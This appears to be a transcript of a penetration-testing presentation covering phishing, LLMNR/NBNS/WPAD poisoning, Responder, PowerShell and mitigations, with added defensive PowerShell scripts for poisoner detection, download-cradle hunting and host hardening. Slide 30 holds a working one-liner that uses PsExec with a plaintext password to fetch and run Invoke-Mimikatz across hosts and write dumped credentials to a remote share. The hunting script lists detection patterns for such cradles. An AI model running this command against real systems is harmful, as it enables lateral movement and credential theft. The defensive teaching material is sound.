Common Network Penetration Testing Techniques Russel Van Tuyl.

Presentation on theme: "Common Network Penetration Testing Techniques Russel Van Tuyl."— Presentation transcript:

1 Common Network Penetration Testing Techniques Russel Van Tuyl

2 Security Analyst; TN Air National Guard; SANS MSISE Student; Father of 2, Husband to 1. Russel.VanTuyl@gmail.com. Russel C. Van Tuyl | Security Analyst | Sword & Shield Enterprise Security | 1431 Centerpoint Blvd., Suite 150 | Knoxville, TN 37932 | P: 865-244-3568 | M: 865-214-0579 | rcvt@sses.net

3 This is how I hack!

4 Hack All The Things: External Network; (Web) Apps; Internal Network; Social Engineering; Wireless; Physical

5 Methodology: Recon/Intel Gathering; Vulnerability Identification/Analysis; Exploitation; Post Exploitation; Reporting (boo)

6

7 Phishing

8

9

10 Social Engineering - Pretext

11 External Assessment

12 Internal Assessment

13 How I see networks

14 Broadcast Messages: go to every host on the subnet, typically in search of a resource (like name resolution). Common Windows broadcast protocols: NetBIOS (RFC 1001 & 1002); LLMNR (RFC 4795, 224.0.0.252 link-scope multicast). Types: Windows Redirector, File Server, Print Server, WPAD

15 NetBIOS Name Service (NBNS) Broadcast Messages

16 Link-Local Multicast Name Resolution (LLMNR) Multicast Messages

17 Web Proxy Autodiscovery Protocol (WPAD). Standard: Internet Engineering Task Force (IETF) draft, http://tools.ietf.org/html/draft-ietf-wrec-wpad-01, expired December 1999. Discovery: DHCP, DNS. Proxy Auto-Config (PAC): wpad.dat; http://findproxyforurl.com
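The broadcast and multicast name-resolution traffic on the previous slides is exactly what a poisoner waits for: it answers every LLMNR/NBNS query it sees. That behaviour also gives defenders a cheap detection. The following PowerShell script is an added example, not part of the slides or of any tool named here: it multicasts an LLMNR query (RFC 4795, 224.0.0.252 on UDP 5355) for a randomly generated name that no host can legitimately own, then reports any address that answers. The canary name, the timeout and the function names are my choices.

```powershell
# Added example (not from the slides): LLMNR "canary" probe for defenders.
# A healthy segment never answers a query for a name nobody owns; a poisoner
# answers everything, so any reply identifies the poisoner's address.

function New-LlmnrQuery {
    param([string]$Name, [uint16]$TransactionId)
    $b = New-Object System.Collections.Generic.List[byte]
    # Header (big-endian): ID, flags=0 (standard query), QDCOUNT=1, ANCOUNT/NSCOUNT/ARCOUNT=0
    $b.AddRange([byte[]]@(($TransactionId -shr 8), ($TransactionId -band 0xFF), 0,0, 0,1, 0,0, 0,0, 0,0))
    # QNAME: length-prefixed labels terminated by a zero byte (DNS wire format)
    foreach ($label in $Name.Split('.')) {
        $lb = [System.Text.Encoding]::ASCII.GetBytes($label)
        $b.Add([byte]$lb.Length)
        $b.AddRange($lb)
    }
    $b.Add(0)
    $b.AddRange([byte[]]@(0,1, 0,1))   # QTYPE=A, QCLASS=IN
    return $b.ToArray()
}

function Test-LlmnrPoisoner {
    param([int]$TimeoutMs = 2000)
    # Random canary name (constructed): nothing legitimate should ever claim it
    $canary = 'canary-' + [guid]::NewGuid().ToString('N').Substring(0, 12)
    $txid   = [uint16](Get-Random -Minimum 1 -Maximum 65535)
    $query  = New-LlmnrQuery -Name $canary -TransactionId $txid

    $udp = New-Object System.Net.Sockets.UdpClient
    $udp.Client.ReceiveTimeout = $TimeoutMs
    $dest = [System.Net.IPEndPoint]::new([System.Net.IPAddress]::Parse('224.0.0.252'), 5355)
    [void]$udp.Send($query, $query.Length, $dest)

    $hits = @()
    $from = [System.Net.IPEndPoint]::new([System.Net.IPAddress]::Any, 0)
    try {
        while ($true) {
            $resp = $udp.Receive([ref]$from)
            if ($resp.Length -lt 12) { continue }          # too short to be an LLMNR header
            $respId = ([int]$resp[0] -shl 8) -bor [int]$resp[1]
            # Only count real answers: same transaction ID and the QR (response) bit set
            if ($respId -eq $txid -and ($resp[2] -band 0x80)) {
                $hits += [pscustomobject]@{ Canary = $canary; Responder = $from.Address.ToString(); Length = $resp.Length }
            }
        }
    } catch {
        # Receive() throws a SocketException once ReceiveTimeout elapses: no more answers
    } finally {
        $udp.Close()
    }
    return $hits
}

$hits = Test-LlmnrPoisoner
if ($hits) {
    $hits | Format-Table -AutoSize
    Write-Warning 'A host answered an LLMNR query for a name that cannot exist: investigate for a poisoner.'
} else {
    Write-Output 'No LLMNR answers for the canary name within the timeout window.'
}
```

Run it from a workstation on the segment you want to check, ideally on a schedule; a single answer is a strong signal because the name is random on every run. NBNS canaries work the same way but need the NetBIOS first-level name encoding of RFC 1001, which this example leaves out.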

18

19 Responder by Laurent Gaffie @pythonresponder Trustwave SpiderLabs https://github.com/SpiderLabs/Responder

20

21 runas.exe

22

23 Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked topologies by utilizing standards-based remoting protocols.

24 powershell.exe: built on .NET Framework; Verb-Noun; tab complete; alias; structured data/objects; syntax highlighting (version 5); released in 2006 on XP*/Vista/Server 2003; .ps1; modules (.psm1); Integrated Scripting Environment (ISE)

25 Download Cradle

26

27

28

29

30 ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p P@$$word1 -s cmd /c powershell -nop -command "& {IEX ((new-object net.webclient).downloadstring('\\172.16.1.205\data\Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}"}
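The one-liner above leaves a very recognisable footprint once PowerShell v5 script block logging is on: the full text of the download cradle lands in Event ID 4104 of the Microsoft-Windows-PowerShell/Operational log. The following script is an added example, not from the slides or from any project named here. It scores script block text against a small indicator list (the patterns, their names and the two constructed sample blocks are mine) and can be pointed at the live event log with Get-WinEvent; the 4104 event carries ScriptBlockText as its third property.

```powershell
# Added example (not from the slides): hunting download cradles in PowerShell
# script block logs (Event ID 4104). Indicator list and samples are constructed
# for illustration; tune both to your environment.

$CradleIndicators = @(
    @{ Name = 'net.webclient download';  Pattern = 'net\.webclient.*download(string|file|data)' },
    @{ Name = 'in-memory execution';     Pattern = '\b(iex|invoke-expression)\b' },
    @{ Name = 'no-profile switch';       Pattern = '(^|\s)-nop\b' },
    @{ Name = 'credential dumping tool'; Pattern = 'invoke-mimikatz|sekurlsa' },
    @{ Name = 'UNC-hosted payload';      Pattern = '\\\\\d{1,3}(\.\d{1,3}){3}\\' }
)

function Get-CradleScore {
    # Returns the names of every indicator that matches the script block text.
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    $hits = foreach ($i in $CradleIndicators) {
        if ($ScriptBlockText -match $i.Pattern) { $i.Name }   # -match is case-insensitive
    }
    return @($hits)
}

function Find-SuspiciousScriptBlock {
    # Reads 4104 events from the local log and keeps those hitting at least $MinHits indicators.
    param([int]$MinHits = 2, [int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value      # ScriptBlockText is the third property of 4104
            $hits = Get-CradleScore -ScriptBlockText $text
            if ($hits.Count -ge $MinHits) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Indicators = ($hits -join ', ')
                    Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed samples: one routine admin task, one cradle-shaped block (192.0.2.0/24 is TEST-NET).
$samples = @(
    'Get-Service | Where-Object Status -eq Running | Export-Csv C:\reports\services.csv',
    "& {IEX ((new-object net.webclient).downloadstring('\\192.0.2.10\share\tool.ps1'))}"
)
foreach ($s in $samples) {
    $hits = Get-CradleScore -ScriptBlockText $s
    '{0} indicator(s) [{1}]: {2}' -f $hits.Count, ($hits -join ', '), $s
}

# On a host with script block logging enabled:
# Find-SuspiciousScriptBlock -MinHits 2 | Format-Table -AutoSize
```

Requiring two or more indicators keeps routine admin scripts out of the results; the benign sample above scores zero and the cradle-shaped one scores three. This is host-side telemetry only: the Empire note on a later slide explains why agents that avoid powershell.exe will not show up here, so pair it with the egress monitoring the mitigation slide recommends.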

31

32 questions?

33 PowerShell Empire: Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

34 Sensitive Data Image removed for distribution

35 Strong Passwords: password database. Local Admin: disable & rename; implement LAPS (https://support.microsoft.com/en-us/kb/3062591). Credential Theft: protected LSASS; Privileged Access Workstations (PAWs) (https://technet.microsoft.com/en-us/library/mt634654.aspx). Least Privilege. Logging: PowerShell v5 (http://www.malwarearchaeology.com/log-md/). Monitor & restrict egress
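Several of the mitigations on this slide, plus turning off the broadcast name resolution that the poisoning slides rely on, are single registry values that Group Policy writes. The following script is an added example, not from the slides: it audits those values on the local host and, only with -Apply, sets them. The registry paths are the ones I know Group Policy and Microsoft's guidance use (LLMNR via the DNSClient policy, WPAD via WpadOverride, LSA Protection via RunAsPPL, PowerShell script block and module logging, NetBIOS over TCP/IP per interface); the control names and the report layout are my own. Verify each path against your own baseline before rolling it out, run it elevated, and expect a reboot for LSA Protection.

```powershell
# Added example (not from the slides): audit and optionally apply host settings
# that blunt broadcast poisoning and credential theft. Without -Apply it only reports.
param([switch]$Apply)

$Desired = @(
    @{ Control = 'Disable LLMNR (DNSClient policy)'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'; Name = 'EnableMulticast'; Value = 0; Type = 'DWord' },
    @{ Control = 'Disable WPAD auto-detection'
       Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad'; Name = 'WpadOverride'; Value = 1; Type = 'DWord' },
    @{ Control = 'LSASS as protected process (RunAsPPL)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Name = 'RunAsPPL'; Value = 1; Type = 'DWord' },
    @{ Control = 'PowerShell script block logging (Event 4104)'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'; Name = 'EnableScriptBlockLogging'; Value = 1; Type = 'DWord' },
    @{ Control = 'PowerShell module logging'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'; Name = 'EnableModuleLogging'; Value = 1; Type = 'DWord' },
    @{ Control = 'PowerShell module logging: all modules'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames'; Name = '*'; Value = '*'; Type = 'String' }
)

function Test-RegistrySetting {
    param($Path, $Name, $Value)
    $current = (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
    return [pscustomobject]@{ Current = $current; Compliant = ($current -eq $Value) }
}

function Set-RegistrySetting {
    param($Path, $Name, $Value, $Type)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
}

function Get-NetbiosStatus {
    # NetbiosOptions per interface: 0 = follow DHCP, 1 = enabled, 2 = disabled
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces' |
        ForEach-Object {
            $opt = (Get-ItemProperty $_.PSPath -Name NetbiosOptions -ErrorAction SilentlyContinue).NetbiosOptions
            [pscustomobject]@{ Interface = $_.PSChildName; NetbiosOptions = $opt; Compliant = ($opt -eq 2) }
        }
}

$report = foreach ($d in $Desired) {
    $state = Test-RegistrySetting -Path $d.Path -Name $d.Name -Value $d.Value
    if ($Apply -and -not $state.Compliant) {
        Set-RegistrySetting -Path $d.Path -Name $d.Name -Value $d.Value -Type $d.Type
        $state = Test-RegistrySetting -Path $d.Path -Name $d.Name -Value $d.Value
    }
    [pscustomobject]@{ Control = $d.Control; Current = $state.Current; Desired = $d.Value; Compliant = $state.Compliant }
}
$report | Format-Table -AutoSize

$nb = Get-NetbiosStatus
if ($Apply) {
    foreach ($i in ($nb | Where-Object { -not $_.Compliant })) {
        Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\$($i.Interface)" -Name NetbiosOptions -Value 2
    }
    $nb = Get-NetbiosStatus
}
$nb | Format-Table -AutoSize
```

Audit mode is safe to run broadly and gives a quick drift report per host; in an Active Directory environment the same values belong in a GPO so they survive local tampering. Disabling LLMNR and NBT-NS is only safe once DNS resolves every name clients rely on, which is why the report shows current versus desired rather than changing anything by default.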

36 Center for Internet Security (CIS) Critical Security Controls https://www.cisecurity.org/critical-controls.cfm CSC 1: Inventory of Authorized and Unauthorized Devices CSC 2: Inventory of Authorized and Unauthorized Software CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers CSC 4: Continuous Vulnerability Assessment and Remediation CSC 5: Controlled Use of Administrative Privileges CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs CSC 7: Email and Web Browser Protections CSC 8: Malware Defenses CSC 9: Limitation and Control of Network Ports, Protocols, and Services CSC 10: Data Recovery Capability CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches CSC 12: Boundary Defense CSC 13: Data Protection CSC 14: Controlled Access Based on the Need to Know CSC 15: Wireless Access Control CSC 16: Account Monitoring and Control CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps CSC 18: Application Software Security CSC 19: Incident Response and Management CSC 20: Penetration Tests and Red Team Exercises

37 How To Get Owned in 10 Easy Steps: 1. Don't patch anything; 2. Don't harden servers; 3. Use default/weak passwords, in multiple places; 4. Use shared accounts/passwords; 5. Use poorly written applications; 6. Allow unrestricted inbound traffic; 7. Allow unrestricted outbound traffic; 8. Use the highest possible privilege levels; 9. Put everything on the Internet (bcuz YOLO!); 10. Assume everything is OK

38 Questions?

